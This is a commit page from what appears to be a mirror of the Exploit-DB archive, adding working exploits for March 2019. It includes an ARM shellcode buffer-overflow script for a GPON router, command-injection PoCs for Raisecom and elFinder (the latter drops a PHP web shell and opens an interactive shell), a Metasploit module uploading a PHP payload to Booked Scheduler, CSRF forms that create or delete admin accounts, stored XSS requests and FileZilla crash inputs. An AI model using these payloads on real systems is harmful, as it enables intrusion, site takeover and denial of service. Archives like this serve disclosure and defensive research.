bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-03-05

Browse source 
20 changes to exploits/shellcodes

Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion

FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)

symphony CMS 2.3 - Multiple Vulnerabilities
Symphony CMS 2.3 - Multiple Vulnerabilities

Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities

Raisecom  XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution

zzzphp CMS 1.6.1 - Cross-Site Request Forgery

Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)

Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)

OOP CMS BLOG 1.0 - Multiple SQL Injection

OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery
CMSsite 1.0 - Multiple Cross-Site Request Forgery
elFinder 2.1.47 - Command Injection vulnerability in the PHP connector
MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
Bolt CMS 3.6.4 - Cross-Site Scripting
Craft CMS 3.1.12 Pro - Cross-Site Scripting
WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting

Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)

Linux/x64 - Kill All Processes Shellcode (11 bytes)

Linux/x86 - iptables -F Shellcode (43 bytes)
This commit is contained in:
Offensive Security 2019-03-05 05:01:50 +00:00
parent 3622d5285d
commit a37e3008e5
22 changed files with 2194 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

147
exploits/hardware/dos/46469.py Executable file
View file

@ -0,0 +1,147 @@
#!/usr/bin/python3
import argparse
import requests
import urllib.parse
import binascii
import re
def run(target):
""" Execute exploitation """
# We're using CVE-2018-10561 and/or it's extension in order to exploit this
# Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this
# issue after successful authentication: "useradmin" permission is enough
#
# IP Spoofing. Perspective option here too
#
# Step 1. Just a request to adjust stack for the exploit to work
#
# POST /GponForm/device_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://192.168.1.1/device.html
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 55
# Connection: close
# Upgrade-Insecure-Requests: 1
#
# XWebPageName=device&admin_action=usb_enable&usbenable=1
headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded',
'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1}
try:
requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2)
except:
pass
# Step 2. Actual Exploitation
#
# POST /GponForm/usb_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://192.168.1.1/usb.html
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 639
# Connection: close
# Upgrade-Insecure-Requests: 1
# XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1
# Weaponizing request:
# mov r8, r8 ; NOP for ARM Thumb
nop = "\xc0\x46"
# .section .text
# .global _start
#
# _start:
# .code 32
# add r3, pc, #1
# bx r3
#
# ; We've removed prev commands as processor is already in Thumb mode
#
# .code 16
# add r0, pc, #8
# eor r1, r1, r1
# eor r2, r2, r2
# strb r2, [r0, #10] ; Changing last char of command to \x00 in runtime
# mov r7, #11
# svc #1
# .ascii "/bin/tftpdX"
shellcode = "\x02\xa0\x49\x40\x52\x40\x82\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x74\x66\x74\x70\x64\x58"
# Overwritting only 3 bytes in order to get \x00 in 4th
pc = "\xe1\x8c\x03"
exploit = "A" + 197 * nop + shellcode + 26*"A" + pc
payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous',
'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'',
'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'}
headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded',
'Connection': 'close', 'Upgrade-Insecure-Requests':'1',
'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
# Prevent requests from URL encoding
payload_str = "&".join("%s=%s" % (k,v) for k,v in payload.items())
try:
requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2)
except:
pass
print("The payload has been sent. Please check UDP 69 port of router for the tftpd service");
print("You can use something like: sudo nmap -sU -p 69 192.168.1.1");
def main():
""" Parse command line arguments and start exploit """
#
# Exploit should be executed after reboot. You can easily achive this in 3 ways:
# 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that
# 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from "device.html" page
# 3) Repeat this exploit at least twice ;)
# any of those will work!
#
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="Examples: %(prog)s -t http://192.168.1.1/")
# Adds arguments to help menu
parser.add_argument("-h", action="help", help="Print this help message then exit")
parser.add_argument("-t", dest="target", required="yes", help="Target URL address like: https://localhost:443/")
# Assigns the arguments to various variables
args = parser.parse_args()
run(args.target)
#
# Main
#
if __name__ == "__main__":
main()

19
exploits/hardware/webapps/46489.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Remote code execution in Raisecom xpon
# Date: 03/03/2019
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: https://www.raisecom.com
# Software Link: https://www.raisecom.com/products/xpon
# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
# Tested on: MacOSX
# CVE-2019-7385
POC:
curl -i -s -k -X 'POST' \
-H 'Origin: http://127.0.0.1&apos; -H -H 'Content-Type:
application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp&apos; \
--data-binary
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
\
'http://192.168.1.1/boaform/formPasswordSetup&apos;

41
exploits/hardware/webapps/46498.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Fiberhome AN5506-04-F - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage: http://www.fiberhomegroup.com/en/
# Version: RP2669
# Tested on: Windows 10
# CVE : CVE-2019-9556
Description:
===========================================================================
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the users browser under the privileges of the web application.
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
Proof of concept :
===========================================================================
1. Login with credential 192.168.1.1
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>
POST /goform/setUser HTTP/1.1
Host: 192.168.1.1
Content-Length: 101
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.1/management/account_admin.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close
account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new

56
exploits/linux/dos/46484.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 20, 2019
# Vendor Homepage: https://filezilla-project.org
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python filezilla.py
# 2.- Open buff.txt and copy content to clipboard
# 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively)
# 4.- In the opend window, Set Search type to "Local search"
# 5.- Paste ClipBoard on "Search directory" and click on "Search"
# 6.- Boom! Crashed...
#!/usr/bin/env python
buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("buff.txt", "w")
f.write(crash)
f.close()
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.
# Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 25, 2019
# Vendor Homepage: https://filezilla-project.org
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python filezilla-2.py
# 2.- Open crash.txt and copy content to clipboard
# 3.- In "Local site" section paste clipboard and Enter.
# 4.- Boom! Crashed...
#!/usr/bin/env python
buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("crash.txt", "w")
f.write(crash)
f.close()
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.

149
exploits/php/webapps/46480.txt Normal file
View file

@ -0,0 +1,149 @@
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Delete Admin</title>
</head>
<body>
<form method="post" action="http://localhost/[PATH]/admin/users.php?del=1">
<input type="submit" value="Delete">
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Edit Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=edit_user&u_id=10" method="POST" enctype="multipart/form-data" >
<!-- You can change u_id value -->
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required>
</div><br>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required>
</div><br>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required>
</div><br>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='User'>Admin</option>
<option value='User'>User</option>
</select>
</div><br>
<div class="form-group">
<label for="post_image">User Image</label>
<input type="file" name="user_image">
</div><br>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" class="form-control"required>
</div><br>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required>
</div><br>
<hr>
<button type="submit" name="update_user" value="Update User">Update User</button>
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=add_user" method="POST" enctype="multipart/form-data">
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required><br><br>
</div>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required><br><br>
</div>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required><br><br>
</div>
<div class="form-group">
<label for="user_image">Image</label>
<input type="file" name="user_image" required><br><br>
</div>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='Admin'>Admin</option><option value='User'>User</option>
</select><br><br>
</div>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" required><br><br>
</div>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required><br><br>
</div>
<button type="submit" name="create_user" value="Add User">Add User</button>
</form>
</body>
</html>

107
exploits/php/webapps/46481.py Executable file
View file

@ -0,0 +1,107 @@
#!/usr/bin/python
'''
# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector.
# Date: 26/02/2019
# Exploit Author: @q3rv0
# Vulnerability reported by: Thomas Chauchefoin
# Google Dork: intitle:"elFinder 2.1.x"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz
# Version: <= 2.1.47
# Tested on: Linux 64bit + Python2.7
# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
# CVE: CVE-2019-9194
# Usage: python exploit.py [URL]
'''
import requests
import json
import sys
payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg'
def usage():
if len(sys.argv) != 2:
print "Usage: python exploit.py [URL]"
sys.exit(0)
def upload(url, payload):
files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data)
j = json.loads(r.text)
return j['added'][0]['hash']
def imgRotate(url, hash):
r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash))
return r.text
def shell(url):
r = requests.get("%s/php/SecSignal.php" % url)
if r.status_code == 200:
print "[+] Pwned! :)"
print "[+] Getting the shell..."
while 1:
try:
input = raw_input("$ ")
r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input))
print r.text
except KeyboardInterrupt:
sys.exit("\nBye kaker!")
else:
print "[*] The site seems not to be vulnerable :("
def main():
usage()
url = sys.argv[1]
print "[*] Uploading the malicious image..."
hash = upload(url, payload)
print "[*] Running the payload..."
imgRotate(url, hash)
shell(url)
if __name__ == "__main__":
main()

22
exploits/php/webapps/46482.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: OOP CMS BLOG 1.0 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
# Multiple files are vulnerable:
# http://localhost/[PATH]/search.php?search=1 [SQLi]&submit=Search
# http://localhost/[PATH]/post.php?id=17 [SQLi]
# http://localhost/[PATH]/posts.php?id=4 [SQLi]
# http://localhost/[PATH]/page.php?pageid=8 [SQLi]
# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi]
# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi]
# Note: Above *id values are random.

175
exploits/php/webapps/46483.txt Normal file
View file

@ -0,0 +1,175 @@
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/userList.php?delUser=34">
<input type="submit" value="Delete">
</form>
</body>
</html>
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Update Site Title and Description)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/titleslogan.php" enctype="multipart/form-data">
<table class="form">
<tr>
<td>
<label>Website Title</label>
</td>
<td>
<input type="text" name="title">
</td>
</tr>
<tr>
<td>
<label>Website Slogan</label>
</td>
<td>
<input type="text" name="slogan">
</td>
</tr>
<tr>
<td>
<label>Upload Logo</label>
</td>
<td>
<input type="file" name="logo"/>
</td>
</tr>
<tr>
<td>
</td>
<td>
<input type="submit" name="submit" Value="Update" />
</td>
</tr>
</form>
</body>
</html>
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Post)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form action="http://localhost/[PATH]/admin/addpost.php" method="post" enctype="multipart/form-data">
<table class="form">
<tr>
<td>
<label>Title</label>
</td>
<td>
<input type="text" name="title" placeholder="Enter Post Title...">
</td>
</tr>
<tr>
<td>
<label>Category</label>
</td>
<td>
<select id="select" name="cat">
<option value="1">Select Category</option>
<option value="19">mr. customer</option>
<option value="2">php</option>
<option value="3">HTML</option>
<option value="4">CSS</option>
<option value="17">c++</option>
<option value="7">java ajax</option>
<option value="20">mr. customer</option>
<option value="18">ajax</option>
</select>
</td>
</tr>
<tr>
<td>
<label>Upload Image</label>
</td>
<td>
<input type="file" name="image"/>
</td>
</tr>
<tr>
<td style="vertical-align: top; padding-top: 9px;">
<label>Content</label>
</td>
<td>
<textarea class="tinymce" name="body"></textarea>
</td>
</tr>
<tr>
<td>
<label>Tags</label>
</td>
<td>
<input type="text" name="tags" placeholder="Enter Tags...">
</td>
</tr>
<tr>
<td>
<label>Authors</label>
</td>
<td>
<input type="text" name="authour" value="admin">
<input type="hidden" name="user_id" value="29">
</td>
</tr>
<tr>
<td>
</td>
<td>
<input type="submit" name="submit" Value="Save" />
</td>
</tr>
</table>
</form>
</body>
</html>
# Note: Many other sections are vulnerable to CSRF, too.
# For example: Delete Post, Add Slider, ...

181
exploits/php/webapps/46486.rb Executable file
View file

@ -0,0 +1,181 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Booked Scheduler v2.7.5 - Remote Command Execution',
'Description' => %q{
This module exploits a file upload vulnerability Booked 2.7.5.
In the "Look and Feel" section of the management panel, you can modify the Logo-Favico-CSS files.
Upload sections has file extension control except favicon part.
You can upload the file with the extension you want through the Favicon field.
The file you upload is written to the main directory of the site under the name "custom-favicon".
After upload the php payload to the main directory, Exploit executes payload and receives shell.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'],
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Booked Scheduler v2.7.5', {}]
],
'DisclosureDate' => '01 March 2019',
'Privileged' => false,
'DefaultTarget' => 0
)
register_options(
[
OptBool.new('SSL', [true, 'Use SSL', false]),
OptString.new('TARGETURI', [true, 'The base path to Booked', '/']),
OptString.new('USER', [true, 'User to login with', 'admin']),
OptString.new('PASS', [true, 'Password to login with', 'admin']),
], self.class)
end
##
# Check Exploit Vulnerable
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/Web/index.php")
})
if res and res.code == 200 and res.body =~ /v2.7.5/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Exploit Portion
##
def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/Web/index.php"),
'vars_post' => {
"email" => datastore['USER'],
"password" => datastore['PASS'],
"captcha" => "",
"resume" => "",
"language" => "en_us",
"login" => "submit"
}
})
if res and res.code == 302
print_status("Successful redirection to admin dashboard.")
else
return res
end
get_cookie = res.get_cookies
cookie = get_cookie
##
# Login Access Control
##
control = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/dashboard.php")
})
html = control.body
if html =~ /Dashboard/
print_good("Login successfuly")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Reading CSRF Token
##
csrf = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php")
})
html = control.body
if html =~ /Look and Feel/
token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
print_status("CSRF Token = #{token}")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Loading phase of the vulnerable file
##
boundary = Rex::Text.rand_text_alphanumeric(29)
data2 = "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\""
data2 << "\r\nContent-Type: text/html\r\n\r\n"
data2 << payload.encoded
data2 << "\n\r\n-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n"
data2 << "#{token}"
data2 << "\r\n-----------------------------{boundary}--\r\n"
res = send_request_raw(
{
'method' => "POST",
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"),
'data' => data2,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
},
'cookie' => cookie
})
if res and res.code == 200
print_good "Payload was successfully uploaded."
else
print_error "Upload failed."
return
end
##
# Command execution and shell retrieval
##
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri, "/Web/custom-favicon.php"),
'cookie' => cookie
}, 25)
if res and res.code == 200
print_good "Payload executed successfully"
end
end
end
##
# End
##

79
exploits/php/webapps/46488.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 26/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9082
Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.
Exploit:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">
<input type="hidden" name="file" value="&#47;zzzphp&#47;template&#47;pc&#47;cn2016&#47;html&#47;search&#46;html" />
<input type="hidden" name="filetext" value="&#123;if&#58;assert&#40;&#36;&#95;POST&#91;x&#93;&#41;&#125;phpinfo&#40;&#41;&#59;&#123;end&#32;if&#125;" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation.
Remarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454

30
exploits/php/webapps/46495.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Bolt CMS - 3.6.4 - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://bolt.cm/
# Software Link : https://github.com/bolt/bolt
# Software : Bolt CMS - v 3.6.4
# Version : v 3.6.4
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9553
# The XSS vulnerability has been discovered in the Bolt CMS web application software due to its vulnerability in the source code in version 3.6.4.
# HTTP POST Request :
POST /bolt/editcontent/pages HTTP/1.1
Host: bolt-up3x24.bolt.dockerfly.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bolt-up3x24.bolt.dockerfly.com/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 562
DNT: 1
Connection: close
Cookie: bolt_session_5c201ab91521b607e364bc74271e51f1=3d540aa1d0a0fc38dde995dc6ba8a32e; bolt_authtoken_5c201ab91521b607e364bc74271e51f1=240049afe75abc53fbe51e75103ed138261da69b180ff241b7e815027c39f6fb
Upgrade-Insecure-Requests: 1
